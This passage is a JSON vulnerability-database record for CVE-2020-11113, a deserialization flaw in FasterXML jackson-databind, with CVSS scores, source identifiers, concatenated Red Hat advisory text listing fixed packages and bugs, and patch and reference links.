"model": "jackson-databind",
"scope": null,
"trust": 0.8,
"vendor": "fasterxml",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003617"
},
{
"db": "NVD",
"id": "CVE-2020-11113"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "158650"
},
{
"db": "PACKETSTORM",
"id": "160601"
},
{
"db": "PACKETSTORM",
"id": "157859"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "157322"
},
{
"db": "PACKETSTORM",
"id": "159271"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1735"
}
],
"trust": 1.4
},
"cve": "CVE-2020-11113",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2020-11113",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-163659",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2020-11113",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2020-11113",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-11113",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2020-11113",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2020-11113",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202003-1735",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-163659",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-11113",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163659"
},
{
"db": "VULMON",
"id": "CVE-2020-11113"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1735"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003617"
},
{
"db": "NVD",
"id": "CVE-2020-11113"
},
{
"db": "NVD",
"id": "CVE-2020-11113"
}
]
},
"description": {
"_id": null,
"data": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.openjpa.ee.WASRegistryManagedRuntime (aka openjpa). FasterXML jackson-databind contains an untrusted data deserialization vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. FasterXML Jackson is a data processing tool for Java developed by American FasterXML Company. jackson-databind is one of the components with data binding function. A security vulnerability exists in FasterXML jackson-databind 2.x versions prior to 2.9.10.4. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. Description:\n\nRed Hat Decision Manager is an open source decision management platform\nthat combines business rules management, complex event processing, Decision\nModel \u0026 Notation (DMN) execution, and Business Optimizer for solving\nplanning problems. It automates business decisions and makes that logic\navailable to the entire business. \n\nIt is recommended to halt the server by stopping the JBoss Application\nServer process before installing this update; after installing the update,\nrestart the server by starting the JBoss Application Server process. \n\nNOTE: This advisory is an addendum to\nhttps://access.redhat.com/errata/RHBA-2020:1414 and is an informational\nadvisory only, to clarify security fixes released therein. No code has been\nmodified as part of this advisory. Description:\n\nRed Hat Single Sign-On 7.4 is a standalone server, based on the Keycloak\nproject, that provides authentication and standards-based single sign-on\ncapabilities for web and mobile applications. Summary:\n\nThis is a security update for JBoss EAP Continuous Delivery 19. JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-18881 - Upgrade Undertow to 2.0.30.SP1\nJBEAP-18974 - Upgrade snakeyaml to 1.26\nJBEAP-18975 - Upgrade cryptacular to 1.2.4\nJBEAP-18982 - Upgrade WildFly Core to 11.0.0.Final-redhat-00001\nJBEAP-18983 - Upgrade Remoting JMX from 3.0.3 to 3.0.4\nJBEAP-19041 - Upgrade WildFly Elytron to 1.11.3.Final\nJBEAP-19042 - Upgrade wildfly-core to 11.0.2.Final\nJBEAP-19076 - Upgrade resteasy from 3.11.0.Final to 3.11.1.Final\nJBEAP-19211 - Empty section Fixed CVEs in CD19 Release Notes\n\n6. Description:\n\nRed Hat Data Grid is a distributed, in-memory, NoSQL datastore based on the\nInfinispan project. \n\nThis release of Red Hat Data Grid 7.3.7 serves as a replacement for Red Hat\nData Grid 7.3.6 and includes bug fixes and enhancements, which are\ndescribed in the Release Notes, linked to in the References section of this\nerratum. Solution:\n\nTo install this update, do the following:\n\n1. Download the Data Grid 7.3.7 server patch from the customer portal. See\nthe download link in the References section. Back up your existing Data Grid installation. You should back up\ndatabases, configuration files, and so on. Install the Data Grid 7.3.7 server patch. Refer to the 7.3 Release Notes\nfor patching instructions. Restart Data Grid to ensure the changes take effect. Bugs fixed (https://bugzilla.redhat.com/):\n\n1595621 - CVE-2017-7658 jetty: Incorrect header handling\n1715075 - CVE-2019-10172 jackson-mapper-asl: XML external entity similar to CVE-2016-3720\n1730462 - CVE-2020-1695 resteasy: Improper validation of response header in MediaTypeHeaderDelegate.java class\n1752770 - CVE-2020-1757 undertow: servletPath is normalized incorrectly leading to dangerous application mapping which could result in security bypass\n1793970 - CVE-2020-1710 EAP: field-name is not parsed in accordance to RFC7230\n1796617 - CVE-2020-1719 Wildfly: EJBContext principal is not popped back after invoking another EJB using a different Security Domain\n1807305 - CVE-2020-1745 undertow: AJP File Read/Inclusion Vulnerability\n1807707 - CVE-2020-1748 Wildfly: Improper authorization issue in WildFlySecurityManager when using alternative protection domain\n1815470 - CVE-2020-10673 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution\n1815495 - CVE-2020-10672 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution\n1816216 - CVE-2020-11612 netty: compression/decompression codecs don\u0027t enforce limits on buffer allocation sizes\n1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking\n1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config\n1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap\n1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core\n1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider\n1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane\n1821304 - CVE-2020-11111 jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory\n1821311 - CVE-2020-11112 jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider\n1821315 - CVE-2020-11113 jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime\n1825714 - CVE-2020-10714 wildfly-elytron: session fixation when using FORM authentication\n1826798 - CVE-2020-11620 jackson-databind: Serialization gadgets in commons-jelly:commons-jelly\n1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop\n1831139 - CVE-2020-9488 log4j: improper validation of certificate with host mismatch in SMTP appender\n\n5. \nThe purpose of this text-only errata is to inform you about the security\nissues fixed in this release. \n\nInstallation instructions are available from the Fuse 7.7.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.7/\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1343616 - CVE-2016-4970 netty: Infinite loop vulnerability when handling renegotiation using SslProvider.OpenSsl\n1620529 - CVE-2018-1000632 dom4j: XML Injection in Class: Element. Methods: addElement, addAttribute which can impact the integrity of XML documents\n1632452 - CVE-2018-3831 elasticsearch: Information exposure via _cluster/settings API\n1637492 - CVE-2018-11797 pdfbox: unbounded computation in parser resulting in a denial of service\n1638391 - CVE-2018-12541 vertx: WebSocket HTTP upgrade implementation holds the entire http request in memory before the handshake\n1697598 - CVE-2019-3797 spring-data-jpa: Additional information exposure with Spring Data JPA derived queries\n1700016 - CVE-2019-0231 mina-core: Retaining an open socket in close_notify SSL-TLS leading to Information disclosure. \n1713468 - CVE-2019-12086 jackson-databind: polymorphic typing issue allows attacker to read arbitrary local files on the server. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: rh-maven35-jackson-databind security update\nAdvisory ID: RHSA-2020:1523-01\nProduct: Red Hat Software Collections\nAdvisory URL: https://access.redhat.com/errata/RHSA-2020:1523\nIssue date: 2020-04-21\nCross references: 1822587 1822174 1822932 1822937 1822927\nCVE Names: CVE-2020-10968 CVE-2020-10969 CVE-2020-11111 \n CVE-2020-11112 CVE-2020-11113 \n=====================================================================\n\n1. Summary:\n\nAn update for rh-maven35-jackson-databind is now available for Red Hat\nSoftware Collections. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - noarch\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.5) - noarch\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6) - noarch\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7) - noarch\nRed Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - noarch\n\n3. Description:\n\nThe jackson-databind package provides general data-binding functionality\nfor Jackson, which works on top of Jackson core streaming API. \n\nSecurity Fix(es):\n\n* jackson-databind: Serialization gadgets in\norg.aoju.bus.proxy.provider.*.RmiProvider (CVE-2020-10968)\n\n* jackson-databind: Serialization gadgets in javax.swing.JEditorPane\n(CVE-2020-10969)\n\n* jackson-databind: Serialization gadgets in\norg.apache.activemq.jms.pool.XaPooledConnectionFactory (CVE-2020-11111)\n\n* jackson-databind: Serialization gadgets in\norg.apache.commons.proxy.provider.remoting.RmiProvider (CVE-2020-11112)\n\n* jackson-databind: Serialization gadgets in\norg.apache.openjpa.ee.WASRegistryManagedRuntime (CVE-2020-11113)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider\n1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane\n1821304 - CVE-2020-11111 jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory\n1821311 - CVE-2020-11112 jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider\n1821315 - CVE-2020-11113 jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime\n\n6. Package List:\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):\n\nSource:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm\n\nnoarch:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm\nrh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):\n\nSource:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm\n\nnoarch:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm\nrh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.5):\n\nSource:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm\n\nnoarch:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm\nrh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6):\n\nSource:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm\n\nnoarch:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm\nrh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7):\n\nSource:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm\n\nnoarch:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm\nrh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm\n\nnoarch:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm\nrh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2020-10968\nhttps://access.redhat.com/security/cve/CVE-2020-10969\nhttps://access.redhat.com/security/cve/CVE-2020-11111\nhttps://access.redhat.com/security/cve/CVE-2020-11112\nhttps://access.redhat.com/security/cve/CVE-2020-11113\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXp7oOtzjgjWX9erEAQghsBAAk6mN7QOctoM4gV9BDkYybnwjFrgzSgQg\nLahdpBV7QmHQ/6rdhSlbE8sGCdrUwLJy1GvRS1PzvUY2IzLf8c0rtzcHrIiD1wWB\nN5kEBWiNgHOpuU4etwbR9gGsY7hhSvyxzTyRhHU36UQJqyNoc95DfbokqeAf8Ggp\ndfw20J8hsCkQ6OkvDCM6T9fY7jcbHdiD4jx8WSMn3bQS3o8zRf1JJlMPOqLnHM+J\n998+RIzoJYqqdL7XNWPMopvR1yps2Xx+NTL4+2Vg8e+2KVxO+ksIu3EqRsCRD0wT\n22iPNX3r8ETjWcfLGw0Imvc8RiRsCL7L4oa+cbIpnBdvsRr/yW8IYmvJmHwFTZlK\n+vIyYPAfSCLuHSktXEwZ9WDMeFsJfZr+zdVZ5MmOgvMAIqg+0RSE3VBlzmuAOMbv\nyNz6SPODozvMDPmW1OwLhtGsu1CigORIuTRcNSYwTkXVoAxFhWXK0sHuxc3h1ne0\nx38Tgk1grF7xbBSfvJwFn0MfBhufg4+iUuFhte7mtuSu3gvjQ/qt01Oo11p8cW2m\ng6lX1NGEsUpEONf0NS+1hFSxWB4ex7ln98e5AqNWtLHt3S5OHzI67+/4dgl5xF7J\nPdLv4j8b1AqTV8wRX6pK59OeslYcPhYdMWHEbMSkQJ3WZFOILkyTm6HWer9kl3Yt\n8yoMyLl6FBM=\n=n1if\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Relevant releases/architectures:\n\n6Client-AMQ-Clients-2 - i386, noarch, x86_64\n6ComputeNode-AMQ-Clients-2 - noarch, x86_64\n6Server-AMQ-Clients-2 - i386, noarch, x86_64\n6Workstation-AMQ-Clients-2 - i386, noarch, x86_64\n7Client-AMQ-Clients-2 - noarch, x86_64\n7ComputeNode-AMQ-Clients-2 - noarch, x86_64\n7Server-AMQ-Clients-2 - noarch, x86_64\n7Workstation-AMQ-Clients-2 - noarch, x86_64\n8Base-AMQ-Clients-2 - noarch, x86_64\n\n3. Description:\n\nRed Hat AMQ Clients enable connecting, sending, and receiving messages over\nthe AMQP 1.0 wire transport protocol to or from AMQ Broker 6 and 7. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):\n\n1821315 - CVE-2020-11113 jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime\n1831139 - CVE-2020-9488 log4j: improper validation of certificate with host mismatch in SMTP appender\n1851327 - CVE-2020-14307 wildfly: EJB SessionOpenInvocations may not be removed properly after a response is received causing Denial of Service\n1853595 - CVE-2020-14297 wildfly: Some EJB transaction objects may get accumulated causing Denial of Service\n\n6. JIRA issues fixed (https://issues.jboss.org/):\n\nENTMQCL-1987 - AMQ Resource Adapter example project is incompatible with Maven 3.6\nENTMQCL-1988 - AMQ Resource Adapter example project does not run\nENTMQCL-2070 - [jms] Log successful reconnects more prominently\n\n7",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-11113"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003617"
},
{
"db": "VULHUB",
"id": "VHN-163659"
},
{
"db": "VULMON",
"id": "CVE-2020-11113"
},
{
"db": "PACKETSTORM",
"id": "158650"
},
{
"db": "PACKETSTORM",
"id": "160601"
},
{
"db": "PACKETSTORM",
"id": "157859"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "157322"
},
{
"db": "PACKETSTORM",
"id": "159271"
}
],
"trust": 2.52
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2020-11113",
"trust": 4.2
},
{
"db": "PACKETSTORM",
"id": "159208",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "158651",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "160601",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "159271",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU95897514",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003617",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1735",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "157322",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2020.1399",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1766",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2588",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.4471",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3190",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1368",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1882",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2619",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3258",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022060909",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "48047",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "158650",
"trust": 0.2
},
{
"db": "CNVD",
"id": "CNVD-2020-21476",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-163659",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2020-11113",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "157859",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "158636",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163659"
},
{
"db": "VULMON",
"id": "CVE-2020-11113"
},
{
"db": "PACKETSTORM",
"id": "158650"
},
{
"db": "PACKETSTORM",
"id": "160601"
},
{
"db": "PACKETSTORM",
"id": "157859"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "157322"
},
{
"db": "PACKETSTORM",
"id": "159271"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1735"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003617"
},
{
"db": "NVD",
"id": "CVE-2020-11113"
}
]
},
"id": "VAR-202003-1785",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-163659"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T21:11:00.691000Z",
"patch": {
"_id": null,
"data": [
{
"title": "hitachi-sec-2021-109",
"trust": 0.8,
"url": "https://github.com/FasterXML/jackson-databind/issues/2670"
},
{
"title": "FasterXML jackson-databind Fixes for code issue vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=115369"
},
{
"title": "Red Hat: Moderate: AMQ Clients 2.8.0 Release",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203817 - Security Advisory"
},
{
"title": "Red Hat: Important: rh-maven35-jackson-databind security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20201523 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Single Sign-On 7.4.0 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20205625 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Data Grid 7.3.7 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203779 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Decision Manager 7.8.0 Security Update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203196 - Security Advisory"
},
{
"title": "Red Hat: Important: EAP Continuous Delivery Technical Preview Release 19 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202333 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Process Automation Manager 7.8.0 Security Update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203197 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat build of Thorntail 2.5.1 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202067 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Fuse 7.7.0 release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203192 - Security Advisory"
},
{
"title": "Hitachi Security Advisories: Multiple Vulnerabilities in Cosminexus",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2021-109"
},
{
"title": "CVE-2020-11113",
"trust": 0.1,
"url": "https://github.com/Al1ex/CVE-2020-11113 "
},
{
"title": "Cubed",
"trust": 0.1,
"url": "https://github.com/yahoo/cubed "
},
{
"title": "Java-Deserialization-CVEs",
"trust": 0.1,
"url": "https://github.com/PalindromeLabs/Java-Deserialization-CVEs "
},
{
"title": "PoC in GitHub",
"trust": 0.1,
"url": "https://github.com/soosmile/POC "
},
{
"title": "PoC in GitHub",
"trust": 0.1,
"url": "https://github.com/developer3000S/PoC-in-GitHub "
},
{
"title": "PoC in GitHub",
"trust": 0.1,
"url": "https://github.com/hectorgie/PoC-in-GitHub "
},
{
"title": "PoC in GitHub",
"trust": 0.1,
"url": "https://github.com/0xT11/CVE-POC "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-11113"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1735"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003617"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-502",
"trust": 1.1
},
{
"problemtype": "Deserialization of untrusted data (CWE-502) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163659"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003617"
},
{
"db": "NVD",
"id": "CVE-2020-11113"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.6,
"url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11113"
},
{
"trust": 1.8,
"url": "https://security.netapp.com/advisory/ntap-20200403-0002/"
},
{
"trust": 1.8,
"url": "https://github.com/fasterxml/jackson-databind/issues/2670"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.1,
"url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2020-11113"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.8,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.8,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu95897514/index.html"
},
{
"trust": 0.7,
"url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2020-11112"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2020-10968"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2020-11111"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-10969"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11111"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10968"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1368/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022060909"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-series-of-vulnerabilities-in-fasterxml-jackson-databind-affect-apache-solr-shipped-with-ibm-operations-analytics-log-analysis/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159271/red-hat-security-advisory-2020-3817-01.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-jackson-databind-shipped-with-ibm-cloud-pak-system/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cognos-business-intelligence-has-addressed-multiple-vulnerabilities-q12021/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2588/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cognos-analytics-has-addressed-multiple-vulnerabilities-3/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6525182"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-faster-xml-jackson-databind-affect-ibm-spectrum-protect-plus-cve-2020-10673-cve-2020-1112-cve-2020-11113-cve-2020-10672-cve-2020-10968-cve-2020-10969-cve-2/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2619/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3258/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1766/"
},
{
